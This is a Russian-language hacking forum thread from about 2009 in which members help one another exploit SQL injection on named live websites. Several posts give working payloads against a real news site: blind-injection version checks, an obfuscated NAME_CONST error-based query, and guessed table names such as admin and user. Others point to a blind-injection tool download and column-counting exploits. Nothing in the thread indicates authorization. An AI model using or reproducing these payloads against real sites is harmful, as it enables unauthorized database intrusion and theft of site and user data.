Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Посмотрите:
    http://naidi-abonenta.ru/activation
     
  2. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Путь к конфигу знаю,увы в конфиге нет путей к сайту нифига...
     
  3. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    на скул инъект наверно в поле ввода номера =)
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://podium.md/news_show.php?id=33'
    доброе время суток уважаемые ачатовцы, хочу попросить помощи в раскрутке скули данного ресурса, либо я очень устал и уперся в банальность либо проблема в самом ресурсе.Заранее благодарен.
     
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2Gorev
    раскручивай как блинд
    http://podium.md/news_show.php?id=33+and+substring(version(),1,1)=5
    думаю нормального вывода не добиться
     
  6. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Code:
    http://podium.md/news_show.php?id=33/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)
    пробуй крутить как блинд
     
    #10526 [x60]unu, 8 Dec 2009
    Last edited: 8 Dec 2009
    1 person likes this.
  7. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2[x60]unu
    где там таблы?
    Code:
    http://podium.md/news_show.php?id=33+and+(select+name_const((select+1),1))
    Incorrect arguments to NAME_CONST
    этот способ в данном случае не прокатит для вывода таблиц и тп.
     
    1 person likes this.
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIMIT+0,1)--

    методом тыка угадал таблы
    admin,news,user
     
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py

    тама дето и хелп к ней лежал
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    маловато кода выложил, где $uploadfile и форма загрузки - непонятно
     
  11. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    Подскажите пожалуйста, можно ли как то обойти следующее в SQL

    Select a from DB-nomer1.user - примерный запрос

    Проблема в экранировании тере "-" и в итоге получаю ошибку

    Какие есть возможности?
     
    #10531 jangle, 9 Dec 2009
    Last edited: 9 Dec 2009
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Нет.
     
  13. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    взять имя БД в обратные кавычки `DB-nomer1`.user, если они не фильтруются, то должно сработать.
     
    2 people like this.
  14. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    2 Ded MustD!e - Thx, помогло!!!
     
  15. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    извините за вопрос ест какой то софт или ехплоит для знать сколько columns
     
  16. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Есть - http://forum.antichat.ru/showthread.php?t=24918
     
  17. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
    И что с ней можно сделать?И что он выдал, вроде обычная страница!
     
  18. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Есть действенный способ! Прочесть статью и удалить с компьютера сканер!

    Статья - http://forum.antichat.ru/threadnav43966-1-40.html

    Сканер - rmb -> delete
     
  19. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
     
  20. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Значит пункт 2 - удалить сканер
     
    2 people like this.
Thread Status:
Not open for further replies.